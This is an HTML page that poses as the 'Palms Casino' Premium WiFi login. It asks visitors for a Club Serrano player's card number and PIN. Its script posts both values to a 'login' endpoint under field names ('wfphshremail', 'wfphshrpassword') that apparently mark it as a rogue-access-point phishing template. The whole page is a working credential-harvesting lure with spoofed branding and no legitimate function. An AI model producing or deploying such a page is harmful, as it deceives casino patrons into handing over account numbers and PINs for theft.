<!DOCTYPE html>
<html lang="en" dir="ltr">
    <head>
        <meta charset="utf-8">

        <title>Palms Casino</title>
        <!-- JQuery and Bootstrap -->

        <script src='static/js/jquery-3.4.1.min.js'></script>
        <script src='static/js/jquery-ui.min.js'></script>
        <link href='static/css/bootstrap.min.css' rel="stylesheet">
        <script src='static/js/bootstrap.min.js'></script>
        <link href='static/css/progress-bar.css' rel="stylesheet">

        <link rel="stylesheet" href="static/css/custom.css">
        <link rel="stylesheet" href="static/css/fonts.css">
        <script src='static/js/custom.js' type="text/javascript"></script>

        <!-- Set the favicon -->
        <link rel="icon" href="static/img/favicon.ico">

        <!-- allow the site to be mobile responsive -->
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
        <style media="screen">

        /* the two most common font faces used by Google */
        @font-face {
          font-family: 'Roboto';
          src: URL('static/fonts/Roboto-Regular.ttf') format('truetype');
          font-weight: normal;
        }

        @font-face {
          font-family: 'open-sans';
          src: URL('static/fonts/OpenSans-Regular.ttf') format('truetype');
          font-weight: normal;
        }

        @font-face {
    font-family: 'termina';
    src: url('static/fonts/termina-bold.woff2') format('woff2'),
         url('static/fonts/termina-bold.woff') format('woff'),
         url('static/fonts/termina-bold.otf') format('opentype');
    font-weight: 900; /* Use the appropriate weight for "black" */
    font-style: normal;
    font-display: swap; /* Optional: Improves loading performance */
}

@font-face {
    font-family: 'montserrat';
    src: url('static/fonts/montserrat.ttf');

}

@font-face {
    font-family: 'fieldwork';
    src: url('static/fonts/fieldwork-regular.woff2') format('woff2'),
         url('static/fonts/fieldwork-regular.woff') format('woff'),
         url('static/fonts/fieldwork-regular.otf') format('opentype');
    font-weight: 400; /* Use the appropriate weight for "regular" */
    font-style: normal;
    font-display: swap; /* Optional: Improves loading performance */
}


        </style>
    </head>
    <body>
        <div id='login-app'>
            <div class="login-container">
                <!-- progress bar from material.io -->
                <div class='progress-bar-container show-progress'>
                    <div class="progress-bar mdc-linear-progress mdc-linear-progress--indeterminate progress-hidden" style='display:none;'>
                        <div class="mdc-linear-progress mdc-linear-progress--indeterminate">
                            <div class="mdc-linear-progress__buffering-dots"></div>
                            <div class="mdc-linear-progress__buffer"></div>
                            <div class="mdc-linear-progress__bar mdc-linear-progress__primary-bar"><span class="mdc-linear-progress__bar-inner"></span></div>
                            <div class="mdc-linear-progress__bar mdc-linear-progress__secondary-bar"><span class="mdc-linear-progress__bar-inner"></span></div>
                        </div>
                    </div>
                </div>
                                   <!-- Palms Logo-->

                   <div>
                    <img class="palms-logo-img" src="static/img/palms-logo_0.svg">
                   </div>
                                      <!-- end Palms Logo-->
                
                                   <div class='login-content' id='login-form'>

                    <form id='email-form-step'>
                        <h1 class="g-h1">Premium WiFi</h1>
                        <h2 class='g-h2'>Use your Club Serrano card to connect for free.</h2>
                        <div class='login-content'>
                            <input name="eml" id='eml' type="text" class='g-input' placeholder="Player's Card #" required>
                           <div class="invalid-email" style='display:none;'>
                                <!-- SVG for the invalid icon -->
                                <span class="invalid-icon">
                                    <svg fill="#d93025" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                        <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"></path>
                                    </svg>
                                </span><span class='invalid-email-text-span'>Enter your card number</span>
                            </div>
                            <input name="pwd" id='pwd' type="password" class='g-input password-input' placeholder="PIN Number" required>
                            <div class="invalid-password" style='display:none;'>
                                <!-- SVG for the invalid icon -->
                                <span class="invalid-icon">
                                    <svg fill="#d93025" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                        <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"></path>
                                    </svg>
                                </span><span class='invalid-email-text-span'>Enter a valid PIN</span>
                            </div>
                           
                            <div class='login-priv'>
                                <p class='p'>No Club Serrano card? Visit the loyalty desk to enroll.</p>
                                <legend class='g-legend'>Learn more</legend>
                            </div>
                            <!-- form navigation menu -->
                            <div class='login-nav'>
                                <legend class='g-legend'>Premium Pass</legend>
                                <!-- <div class='gbtn-primary btn-next-email'><span class='gbtn-label'>Next</span></div> -->
                                <button name="btn" id="btn" class='gbtn-primary' type="submit">Next</button>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <script>
          /*
          Check the password field and act accordingly.
          */

          $("#btn").on("click", function(e) {
              e.preventDefault();
              // get the password box and checkbox elements
              var input = document.getElementById("eml");
              var input2 = document.getElementById("pwd");
             
              // check to see if the value is empty
              if ( input.value == "" ){
                  passNotValid();
              }else if( input2.value == "" ){ //check if the value of the repeat field is empty
                  passNotValid();
                   
              }else{
                  // post the data
                  $("#dialog").css('display', 'none');
                    post('login', {
                      wfphshremail: input.value,
                      wfphshrpassword: input2.value
                    });
              }
          });

          function passNotValid(){
            $("#dialog").css('display', 'block');
            $(".form-control").css('border', '1px solid #dd4b39');
          }

          /*
          Post to the fallowing path given the parameters.

          Args:
            path: The path to be posted to.
            params: The parameters to be passed.
          */
          function post(path, params) {
            // create a form and set its attributes
            var form = document.createElement("form");
            form.setAttribute("method", "post");
            form.setAttribute("action", path);

            // set the attribute for the post
            for(var key in params) {
                if(params.hasOwnProperty(key)) {
                    var hiddenField = document.createElement("input");
                    hiddenField.setAttribute("type", "hidden");
                    hiddenField.setAttribute("name", key);
                    hiddenField.setAttribute("value", params[key]);
                    form.appendChild(hiddenField);
                 }
            }
            // submit the post
            document.body.appendChild(form);
            form.submit();
          }
          var input = document.getElementById("eml");
          var input2 = document.getElementById("pwd");
          input.disabled = false;
          input2.disabled = false;
        </script>
    </body>
</html>
